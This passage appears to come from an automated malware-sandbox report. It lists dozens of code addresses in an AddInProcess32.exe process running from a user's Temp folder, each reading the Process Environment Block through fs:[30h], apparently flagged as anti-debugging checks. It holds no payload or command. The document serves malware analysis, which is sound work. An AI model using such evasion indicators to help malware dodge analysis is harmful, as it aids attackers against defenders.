          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01842581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01842581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01842581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01842990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01841DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01841DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01841DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01819100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01819100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01819100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01834120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01834120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01834120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01834120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01834120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0189A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01844D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01844D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01844D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01853D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01893540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01837D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01819080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01893884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01893884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01896C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01897016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01897016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01897016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01830050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01830050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01821B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01821B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01842397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01828794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01897794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01897794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01897794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01844BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01844BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01844BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01814F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01814F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01843B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01843B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01858EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01842ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01842AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01848E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1608 mov eax, dword ptr fs:[00000030h]
